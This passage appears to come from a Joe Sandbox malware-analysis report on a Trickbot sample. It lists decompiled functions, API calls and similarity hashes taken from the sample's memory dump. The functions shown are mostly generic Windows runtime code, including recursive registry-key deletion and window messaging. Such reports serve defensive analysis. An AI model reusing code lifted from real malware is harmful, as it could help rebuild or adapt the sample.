				char* _t26;

				_t26 = E004061F2(_a4);
				_t8 =  &(_t26[lstrlenA(_t26)]);
				if(_t8 != 0) {
					while(1) {
						 *_t8 =  *_t8 & 0x00000000;
						E00406AA0(_t26, _t8);
						_pop(_t22);
						if(RegOpenKeyA(0x80000000, _t26,  &_a4) != 0) {
							goto L7;
						}
						if(RegEnumKeyA(_a4, 0,  &_v268, 0x105) == 0) {
							_push(1);
							_pop(0);
						}
						RegCloseKey(_a4);
						if(0 == 0) {
							RegDeleteKeyA(0x80000000, _t26);
							_t8 = E00405F05(_t22, _t26, 0x5c);
							if(_t8 != 0) {
								continue;
							}
						}
						goto L7;
					}
				}
				L7:
				E004053B8(_t26);
				_t10 = 1;
				return _t10;
			}

0x00433359
0x00433362
0x00433364
0x0043336b
0x0043336b
0x00433370
0x00433379
0x00433385
0x00000000
0x00000000
0x004333a1
0x004333a3
0x004333a5
0x004333a5
0x004333a9
0x004333b1
0x004333b5
0x004333be
0x004333c7
0x00000000
0x00000000
0x004333c7
0x00000000
0x004333b1
0x0043336b
0x004333c9
0x004333ca
0x004333d2
0x004333d7

APIs

lstrlenA.KERNEL32(00000000), ref: 0043335C
RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 0043337D
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00433399
RegCloseKey.ADVAPI32(?), ref: 004333A9
RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 004333B5

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CloseDeleteEnumOpenlstrlen
String ID:
API String ID: 160701936-0
Opcode ID: bd9241ab598931815e592067fcab6f7eeaca3563938b95659ef57e96da0b5b31
Instruction ID: 84eb8a883a421ca8b80f357d9c5ca2d7f650650da258fd514938724bd86cd58a
Opcode Fuzzy Hash: bd9241ab598931815e592067fcab6f7eeaca3563938b95659ef57e96da0b5b31
Instruction Fuzzy Hash: 8D01C4322005147EF7256F22EC49FAB3B6CDF057A6F11503BF900D8190DBA88D4189AC

Uniqueness

Uniqueness Score: -1.00%

Function 00423173, Relevance: 7.6, APIs: 5, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00423173(void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int* _a12) {
				signed int _t14;
				signed int _t22;
				intOrPtr* _t25;
				struct HWND__* _t27;

				_t25 = _a4;
				_t27 = E00422F27(_t25, _a8);
				if( *_t25 != 0) {
					 *_a12 =  *_a12 | 0xffffffff;
				}
				_t22 = 0;
				L3:
				L3:
				if((SendMessageA(_t27, 0x87, 0, 0) & 0x00000040) != 0) {
					_push(0);
					if( *_a4 == 0) {
						SendMessageA(_t27, 0xf1, 0 | _t22 ==  *_a12, ??);
					} else {
						if(SendMessageA(_t27, 0xf0, 0, ??) != 0) {
							 *_a12 = _t22;
						}
					}
					_t22 = _t22 + 1;
				}
				_t14 = GetWindow(_t27, 2);
				_t27 = _t14;
				if(_t27 == 0) {
					goto L11;
				}
				_t14 = GetWindowLongA(_t27, 0xfffffff0);
				if((_t14 & 0x00020000) == 0) {
					goto L3;
				}
				L11:
				return _t14;
			}

0x00423177
0x00423188
0x0042318c
0x00423192
0x00423192
0x0042319b
0x00000000
0x0042319d
0x004231a9
0x004231af
0x004231b2
0x004231db
0x004231b4
0x004231bf
0x004231c5
0x004231c5
0x004231bf
0x004231dd
0x004231dd
0x004231e1
0x004231e7
0x004231eb
0x00000000
0x00000000
0x004231f0
0x004231fb
0x00000000
0x00000000
0x00423201
0x00423201

APIs

SendMessageA.USER32(00000000,00000087,00000000,00000000), ref: 004231A5
SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 004231BB
SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 004231DB
GetWindow.USER32(00000000,00000002), ref: 004231E1
GetWindowLongA.USER32(00000000,000000F0), ref: 004231F0

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MessageSend$Window$Long
String ID:
API String ID: 2965483870-0
Opcode ID: 6b310d737563514cba5873572198cb5c49260d0c529e2cc1dbb8f76df7cedd54
Instruction ID: 52a1fb7029db56fec016f2777fd38856a271451d11a9507dbd238d9ef48929f7
Opcode Fuzzy Hash: 6b310d737563514cba5873572198cb5c49260d0c529e2cc1dbb8f76df7cedd54
Instruction Fuzzy Hash: 8A11483230032AAFC2219F24EC44E7B77A8EF833A5F05021AF4519B290CB386D118A79

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD87, Relevance: 7.6, APIs: 5, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DD87(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				void* __ebp;
				int _t20;
				unsigned int _t39;
				intOrPtr _t45;

				_v8 = __ecx;
				_t45 =  *((intOrPtr*)(E00432562() + 4));
				if(_t45 != 0 && _a8 != 0) {
					_t39 = _a8 >> 0x10;
					if(_t39 != 0) {
						_t20 =  *(_t45 + 0xb0);
						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
						}
					}
				}
				return 0;
			}

0x0042dd91
0x0042dd99
0x0042dd9e
0x0042ddb2
0x0042ddb8
0x0042ddbe
0x0042ddc9
0x0042dde9
0x0042ddf8
0x0042de0e
0x0042de17
0x0042de3b
0x0042de42
0x0042ddc9
0x0042ddb8
0x0042de47

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 0042DDE9
GlobalAddAtomA.KERNEL32(?), ref: 0042DDF8
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 0042DE0E
GlobalAddAtomA.KERNEL32(?), ref: 0042DE17
SendMessageA.USER32(?,000003E4,?,?), ref: 0042DE3B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: cf648b128c842a3be20496c9249eca8f14ef7bb6dbd7c0954b06a59677297fb6
Instruction ID: d23d5cd3cee687374455251e2c5dfc6ab9c60739f91a2db05045cf6e9b85a4a8
Opcode Fuzzy Hash: cf648b128c842a3be20496c9249eca8f14ef7bb6dbd7c0954b06a59677297fb6
Instruction Fuzzy Hash: 4E118275900218AADB20EF64EC44BEBB3BDEF54700F014456E59597180E7B8AFC0CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004193D1, Relevance: 7.6, APIs: 5, Instructions: 52
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004193D1() {
				CHAR* _t35;
				WNDCLASSA* _t37;
				void* _t40;
				void* _t42;

				E00405340(E004377F8, _t40);
				_t37 =  *(_t40 + 8);
				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
					L5:
					_push(1);
					_pop(0);
					L6:
					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
					return 0;
				}
				if(RegisterClassA(_t37) != 0) {
					if( *((intOrPtr*)(E00432562() + 0x14)) != 0) {
						E004330FA(1);
						 *(_t40 - 4) = 0;
						_t9 = E00432562() + 0x34; // 0x34
						_t35 = _t9;
						lstrcatA(_t35, _t37->lpszClassName);
						 *(_t40 + 0xa) = 0xa;
						 *((char*)(_t40 + 0xb)) = 0;
						lstrcatA(_t35, _t40 + 0xa);
						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
						E0043316A(1);
					}
					goto L5;
				}
				goto L6;
			}

0x004193d6
0x004193e0
0x004193e7
0x004193f9
0x0041944e
0x0041944e
0x00419450
0x00419451
0x00419456
0x0041945f
0x0041945f
0x00419405
0x00419415
0x00419419
0x0041941e
0x0041942f
0x0041942f
0x00419433
0x00419438
0x0041943e
0x00419441
0x00419443
0x00419449
0x00419449
0x00000000
0x00419415
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004193D6
GetClassInfoA.USER32(?,?,?), ref: 004193F1
RegisterClassA.USER32(?), ref: 004193FC
lstrcatA.KERNEL32(00000034,?,00000001), ref: 00419433
lstrcatA.KERNEL32(00000034,?), ref: 00419441

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: cc7567838c53c84fda94d59d8eb3afb562a4490fc6628ce5f25176632f354622
Instruction ID: e344387831f26c0ba60798fb2310eb8a0951f993e028fd3d0391761737ab876e
Opcode Fuzzy Hash: cc7567838c53c84fda94d59d8eb3afb562a4490fc6628ce5f25176632f354622
Instruction Fuzzy Hash: 34112B75508204BEDB10EFA4DD41ADE7BB8EF18714F00551BF802A7151C7B8EF428B69

Uniqueness

Uniqueness Score: -1.00%

Function 0042ECBE, Relevance: 7.6, APIs: 5, Instructions: 52
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042ECBE(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t33;
				void* _t40;
				int _t43;
				struct HWND__* _t47;
				void* _t49;

				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
				_push(_t49);
				_push(0x98);
				_push(__ebx);
				_t40 = 0x98;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t47 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t47 != 0) {
					_t43 = _a4 << 0x10;
					do {
						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
						_t47 = GetParent(_t47);
					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
				} else {
					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t33;
			}

0x0042ecc3
0x0042ecc7
0x0042ecd3
0x0042ecd6
0x0042ecd7
0x0042ece0
0x0042ece9
0x0042eceb
0x0042eced
0x0042eced
0x0042ecf9
0x0042ecfb
0x0042ecfd
0x0042ecfd
0x0042ed0a
0x0042ed14
0x0042ed17
0x0042ed43
0x0042ed45
0x0042ed56
0x0042ed60
0x0042ed60
0x0042ed19
0x0042ed36
0x0042ed36
0x0042ed73

APIs

GetKeyState.USER32(00000011), ref: 0042ECE4
GetKeyState.USER32(00000010), ref: 0042ECF4
GetFocus.USER32 ref: 0042ED04
GetDesktopWindow.USER32 ref: 0042ED0C
SendMessageA.USER32(?,0000020A,?,?), ref: 0042ED30

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: State$DesktopFocusMessageSendWindow
String ID:
API String ID: 2814764316-0
Opcode ID: 78f3289676728ec7c430074fa4a0741f0a68352bbb13ac36b7cd3c032ab2592b
Instruction ID: e26d5c3a50eb72497c11d98db4b862705f00d333b81dfebf8a3e9653c5300b22
Opcode Fuzzy Hash: 78f3289676728ec7c430074fa4a0741f0a68352bbb13ac36b7cd3c032ab2592b
Instruction Fuzzy Hash: 7601D832B01225BFEB001A96EC49FA87798DB147A4F504427FA42D7281D9F89C4356A8

Uniqueness

Uniqueness Score: -1.00%

Function 00435271, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00435271(void* __ecx, char _a8) {
				struct tagPOINT _v12;
				void* __ebp;
				void* _t15;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;

				_push(__ecx);
				_push(__ecx);
				_t26 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t26 + 0x1c),  &_v12);
					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E00434D19(_t26, _t24,  &_v12,  &_a8) == 0) {
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t28 = _t26 + 0x100;
						if( *_t28 == 0) {
							 *_t28 = LoadCursorA( *(E00432562() + 0xc), 0x7902);
						}
						_push( *_t28);
					}
					SetCursor();
					_t15 = 0;
				} else {
					_t15 = E004187B4(__ecx);
				}
				return _t15;
			}

0x00435274
0x00435275
0x0043527b
0x0043527d
0x0043528a
0x00435297
0x004352a4
0x004352eb
0x004352b9
0x004352b9
0x004352c2
0x004352d8
0x004352d8
0x004352da
0x004352da
0x004352ec
0x004352f2
0x0043527f
0x0043527f
0x0043527f
0x004352f6

APIs

GetCursorPos.USER32(?), ref: 0043528A
ScreenToClient.USER32(?,?), ref: 00435297
LoadCursorA.USER32(?,00007902), ref: 004352D2
SetCursor.USER32(00000000), ref: 004352EC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Cursor$ClientLoadScreen
String ID:
API String ID: 120721131-0
Opcode ID: f430f3dc0f5984a2286113d03436679f97c67de7130d3ecef97d3d433d2c3439
Instruction ID: e1456d8807b83b93601c3d4f2b4a481a1c698153f809d99b1de5ad29577f6afd
Opcode Fuzzy Hash: f430f3dc0f5984a2286113d03436679f97c67de7130d3ecef97d3d433d2c3439
Instruction Fuzzy Hash: 6D017171504204EFDB109FA0DC09EDB77ECEF18315F10946AF946D2290DBB89945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00425ABF, Relevance: 7.5, APIs: 5, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00425ABF(void* __ecx, void* __eflags, int* _a4) {
				void* _t14;
				int* _t15;
				void* _t22;
				void* _t26;
				void* _t27;
				void* _t32;

				_t32 = __eflags;
				_t22 = __ecx;
				_push(GetDC( *(__ecx + 0x1c)));
				_t27 = E00420D46();
				_t14 = E0042C740(_t32);
				_t26 = 0;
				if(_t14 != 0) {
					_t26 = SelectObject( *(_t27 + 4),  *(_t14 + 4));
				}
				_t15 = _a4;
				_t24 = _t15[1];
				PatBlt( *(_t27 + 4),  *_t15, _t15[1], _t15[2] -  *_t15, _t15[3] - _t24, 0x5a0049);
				if(_t26 != 0) {
					SelectObject( *(_t27 + 4), _t26);
				}
				return ReleaseDC( *(_t22 + 0x1c),  *(_t27 + 4));
			}

0x00425abf
0x00425ac1
0x00425acd
0x00425ad3
0x00425ad5
0x00425ada
0x00425ade
0x00425aec
0x00425aec
0x00425aee
0x00425af8
0x00425b0e
0x00425b17
0x00425b1d
0x00425b1d
0x00425b32

APIs

GetDC.USER32(?), ref: 00425AC7

Part of subcall function 0042C740: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0042A724), ref: 0042C77F
Part of subcall function 0042C740: CreatePatternBrush.GDI32(00000000), ref: 0042C78C
Part of subcall function 0042C740: DeleteObject.GDI32(00000000), ref: 0042C798

SelectObject.GDI32(?,?), ref: 00425AE6
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00425B0E
SelectObject.GDI32(?,00000000), ref: 00425B1D
ReleaseDC.USER32(?,?), ref: 00425B29

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Object$CreateSelect$BitmapBrushDeletePatternRelease
String ID:
API String ID: 2474928807-0
Opcode ID: a88e8238d2fa25ddb1faf6588d1a11480260b01b21abd649efc3a5c2b6a86e80
Instruction ID: 2e252b97cd2aa297da7c2b5f74bc8b2d03b140b747af17399cb68d0102856402
Opcode Fuzzy Hash: a88e8238d2fa25ddb1faf6588d1a11480260b01b21abd649efc3a5c2b6a86e80
Instruction Fuzzy Hash: CB014B76200205AFDB549FA5ED4EC277BAAEB89711305807AF51587232CB76EC11DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00415AB7, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415AB7(void* _a4, void* _a8) {
				void* _v12;
				DEVMODEA* _t9;
				void* _t20;
				struct HDC__* _t22;
				signed short* _t23;

				if(_a4 == 0) {
					L5:
					return 0;
				}
				_t23 = GlobalLock(_a4);
				_t20 = _a8;
				if(_t20 == 0) {
					_t9 = 0;
				} else {
					_t9 = GlobalLock(_t20);
				}
				if(_t23 != 0) {
					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
					GlobalUnlock(_v12);
					if(_t20 != 0) {
						GlobalUnlock(_t20);
					}
					return _t22;
				} else {
					goto L5;
				}
			}

0x00415abf
0x00415ae2
0x00000000
0x00415ae2
0x00415acd
0x00415acf
0x00415ad5
0x00415adc
0x00415ad7
0x00415ad8
0x00415ad8
0x00415ae0
0x00415b07
0x00415b0d
0x00415b11
0x00415b14
0x00415b14
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GlobalLock.KERNEL32(?,?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415ACB
GlobalLock.KERNEL32(?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415AD8
CreateDCA.GDI32(?,?,?,00000000), ref: 00415AFB
GlobalUnlock.KERNEL32(?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415B0D
GlobalUnlock.KERNEL32(?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415B14

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: b44548100888a0923bcceb94c45566190a79f0afcf222bf1d72181f2492fec3f
Instruction ID: 2c08fb966d1a7657c9be5eb2bf69ce89cebc09f1f78a66de6fdd2645592b3639
Opcode Fuzzy Hash: b44548100888a0923bcceb94c45566190a79f0afcf222bf1d72181f2492fec3f
Instruction Fuzzy Hash: 64F0A472314721DBC770AB299CC4AA77ADCEFC4B91B240826F885D2200D668DC44D774

Uniqueness

Uniqueness Score: -1.00%

Function 0042CEEB, Relevance: 7.5, APIs: 5, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CEEB(void* __ecx) {
				struct tagMSG _v28;
				void* _t9;
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t25 + 0x1c)) {
						ReleaseCapture();
					}
					_t13 = E00419EDA(_t25);
					 *((intOrPtr*)(_t25 + 0x50)) = 0;
					 *((intOrPtr*)(_t13 + 0x50)) = 0;
					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
				}
				return _t9;
			}

0x0042cef0
0x0042cef7
0x0042cf1a
0x0042cf22
0x0042cf22
0x0042cf2d
0x0042cf2f
0x0042cf2f
0x0042cf37
0x0042cf3e
0x0042cf46
0x00000000
0x0042cf4f
0x0042cf55

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 0042CF0C
PostMessageA.USER32(?,00000367,00000000,00000000), ref: 0042CF22
GetCapture.USER32 ref: 0042CF24
ReleaseCapture.USER32 ref: 0042CF2F
PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 0042CF4C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: cb40a05a609ce3852dd88cd409f17210669b483ccddc9dc4f3de6c85b3edc9fd
Instruction ID: 312944fcce09cba8e1cf79d00220d8df66d2544df6643da8a0730fbf5c1243bc
Opcode Fuzzy Hash: cb40a05a609ce3852dd88cd409f17210669b483ccddc9dc4f3de6c85b3edc9fd
Instruction Fuzzy Hash: 2BF0A431204748BFC721AF12EC44D1BBFBDFB81748B41452EF14192551C776E9058A68

Uniqueness

Uniqueness Score: -1.00%

Function 00407B13, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00407B13() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x448210);
				if(_t16 == 0) {
					_t16 = E00406991(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x448210, _t16) == 0) {
						E004052AF(0x10);
					} else {
						E00407B00(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x00407b21
0x00407b29
0x00407b2d
0x00407b38
0x00407b3e
0x00407b68
0x00407b51
0x00407b52
0x00407b58
0x00407b5e
0x00407b62
0x00407b62
0x00407b3e
0x00407b6f
0x00407b79

APIs

GetLastError.KERNEL32(?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B15
TlsGetValue.KERNEL32(?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B23
SetLastError.KERNEL32(00000000,?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B6F

Part of subcall function 00406991: HeapAlloc.KERNEL32(00000008,?,?,?,?,00407ACB,00000001,00000074,?,00405217), ref: 004069E6

TlsSetValue.KERNEL32(00000000,?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B47
GetCurrentThreadId.KERNEL32(?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B58

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 53a44ecace3c589dcac9cf14d62ab24f2b011c4ed0d0c133a374d3aaa4381302
Instruction ID: 90818a2a7397ba7ad137bd5c4078d5426f7f662d2f94fd885d5ed0fba108b92b
Opcode Fuzzy Hash: 53a44ecace3c589dcac9cf14d62ab24f2b011c4ed0d0c133a374d3aaa4381302
Instruction Fuzzy Hash: 2AF06236D45A216BC6212B74AC49A5A3B60EB01775720057EF942A62E0CEBCAC01869D

Uniqueness

Uniqueness Score: -1.00%

Function 004301F7, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004301F7(struct tagRECT* _a4, long _a8, signed char _a10) {
				void* __esi;
				void* __ebp;
				int _t13;
				int _t14;
				intOrPtr _t16;
				void* _t19;
				struct tagRECT* _t21;

				if( *0x44b35c != 0) {
					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
				}
				if((_a8 & 0x00040600) == 0) {
					_push(GetSystemMetrics(6));
					_push(5);
				} else {
					_push(GetSystemMetrics(0x21));
					_push(0x20);
				}
				_t13 = GetSystemMetrics();
				_t21 = _a4;
				_t14 = InflateRect(_t21, _t13, ??);
				if((_a10 & 0x000000c0) != 0) {
					E0042F264(_t19, _t21);
					_t16 =  *0x44b72c; // 0x0
					_t21->top = _t21->top - _t16;
					return _t16;
				}
				return _t14;
			}

0x00430202
0x00000000
0x00430211
0x00430220
0x0043023b
0x0043023c
0x00430222
0x0043022c
0x0043022d
0x0043022d
0x0043023e
0x00430240
0x00430245
0x0043024f
0x00430251
0x00430256
0x0043025b
0x00000000
0x0043025b
0x00430260

APIs

AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 00430211
GetSystemMetrics.USER32(00000021), ref: 0043022A
GetSystemMetrics.USER32(00000005), ref: 0043023E
InflateRect.USER32(?,00000000), ref: 00430245

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: c2f9182dacb039938dbfeebd1a145ead52bc5e7b718ac6c8aac088017c69c67c
